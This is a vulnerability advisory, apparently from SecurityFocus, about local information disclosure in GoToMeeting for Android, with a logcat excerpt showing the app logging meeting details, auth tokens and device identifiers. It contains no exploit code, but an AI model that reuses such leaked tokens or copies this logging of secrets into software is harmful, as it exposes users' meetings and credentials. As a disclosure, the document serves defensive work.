source: https://www.securityfocus.com/bid/65123/info GoToMeeting for Android is prone to multiple local information-disclosure vulnerabilities. Local attackers can exploit these issues to obtain sensitive information, which may aid in further attacks. GoToMeeting 5.0.799.1238 is vulnerable; other versions may also be affected. <! ----- SNIPPET ------- !> D/G2M (32190): HttpRequest to: https://www.example.com/meeting/getInfo/[MEETING_ID_REDACTED]?Portal=www.gotomeeting.com&android=true&MeetingID=[MEETING_ID_REDACTED] E/qcom_sensors_hal( 787): hal_process_report_ind: Bad item quality: 11 D/dalvikvm(32190): GC_CONCURRENT freed 1322K, 43% free 20491K/35456K, paused 6ms+1ms, total 33ms D/G2M (32190): HttpRequest response from: GET https://www.example.com/meeting/getInfo/[MEETING_ID_REDACTED]?Portal=www.gotomeeting.com&android=true&MeetingID=[MEETING_ID_REDACTED] -> 200 D/G2M (32190): HttpRequest response body: GET https://www.example.com/meeting/getInfo/[MEETING_ID_REDACTED]?Portal=www.gotomeeting.com&android=true&MeetingID=[MEETING_ID_REDACTED] -> {"Status":"Redirect","RedirectHost":"www1.gotomeeting.com","MeetingId":"[MEETING_ID_REDACTED]"} D/G2M (32190): Got 302 from legacy JSON API: www1.gotomeeting.com D/G2M (32190): HttpRequest to: https://www.example.com/meeting/getInfo/[MEETING_ID_REDACTED]?android=true&MeetingID=[MEETING_ID_REDACTED] D/G2M (32190): HttpRequest response from: GET https://www.example.com/meeting/getInfo/[MEETING_ID_REDACTED]?android=true&MeetingID=[MEETING_ID_REDACTED] -> 200 D/G2M (32190): HttpRequest response body: GET https://www.example.com/meeting/getInfo/[MEETING_ID_REDACTED]?android=true&MeetingID=[MEETING_ID_REDACTED] -> {"Status":"MeetingNotStarted","MeetingId":"[MEETING_ID_REDACTED]","IsRecurring":false,"Endpoints":["Native"],"OrganizerName":"[REDACTED]","Subject":"[REDACTED]","MaxAttendees":100,"IsWebinar":false,"AudioParameters":{"CommParams":{"disableUdp":false},"ConferenceParams":{"supportedModes":"VoIP,PSTN,Private","initialMode":"Hybrid","SpeakerInfo":{"PhoneInfo":[{"description":"Default","number":"[REDACTED],"authToken":"AAFe4rYexu4Dm7qrL45/Egx+AAAAAFLdeSkAAAAAUt7KqUbWYmXH3OcczkhGaWRf0wM2OKWa","accessCode":"REDACTED"},"userId":"userId","authToken":"EAEBAQEBAQEBAQEBAQEBAQE=","privateMessage":"","audioKey":-1,"BridgeMutingControl":true,"VCBParams":{"Codec":[{"payloadType":103,"frameLength":30,"name":"ISAC","bitrate":32000,"channels":1,"samplingRate":16000},{"payloadType":0,"frameLength":20,"name":"PCMU","bitrate":64000,"ch annels":1,"samplingRate":8000}],"VCB":{"port":5060,"ipAddr":"10.23.70.151"},"Options":{"asUpdates":true,"rtUpdates":true,"dtx":false}}}},"EndTime":1390239900000,"StartTime":1390237200000,"IsImpromptu":false} D/G2M (32190): Got response from legacy JSON API: 200 D/G2M (32190): JoinService: Attempting to join Meeting D/G2M (32190): MeetingService: Starting Meeting join on legacy... D/G2M (32190): HttpRequest to: https://www.example.com/meeting/getInfo/[MEETING_ID_REDACTED]?android=true&MeetingID=[MEETING_ID_REDACTED]&PhoneInfo=,MachineID=WFNUUVtWBVRUVwRQAwUCAA==,G2MAppVersion=5.0.799.1238,BuildType=releaseBuild,Brand=google,Manufacturer=LGE,Model=Nexus5,AndroidVersionRelease=4.4.2,AndroidVersionIncremental=937116,ID=KOT49H,Product=hammerhead,Device=hammerhead,CpuABI=armeabi-v7a D/G2M (32190): ServiceResolver: COLService: BaseURL [https://www.example.com], isLegacy [true}, isWebinar [false] D/G2M (32190): HttpRequest response from: GET https://www.example.com/meeting/getInfo/[MEETING_ID_REDACTED]?Portal=www.gotomeeting.com&android=true&MeetingID=[MEETING_ID_REDACTED]&PhoneInfo=,MachineID=WFNUUVtWBVRUVwRQAwUCAA==,G2MAppVersion=5.0.799.1238,BuildType=releaseBuild,Brand=google,Manufacturer=LGE,Model=Nexus5,AndroidVersionRelease=4.4.2,AndroidVersionIncremental=937116,ID=KOT49H,Product=hammerhead,Device=hammerhead,CpuABI=armeabi-v7a -> 302 D/G2M (32190): HttpRequest response body: GET https://www.example.com/meeting/getInfo/[MEETING_ID_REDACTED]?Portal=www.gotomeeting.com&android=true&MeetingID=[MEETING_ID_REDACTED]&PhoneInfo=,MachineID=WFNUUVtWBVRUVwRQAwUCAA==,G2MAppVersion=5.0.799.1238,BuildType=releaseBuild,Brand=google,Manufacturer=LGE,Model=Nexus5,AndroidVersionRelease=4.4.2,AndroidVersionIncremental=937116,ID=KOT49H,Product=hammerhead,Device=hammerhead,CpuABI=armeabi-v7a -> <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <! ----- SNIPPET ------- !>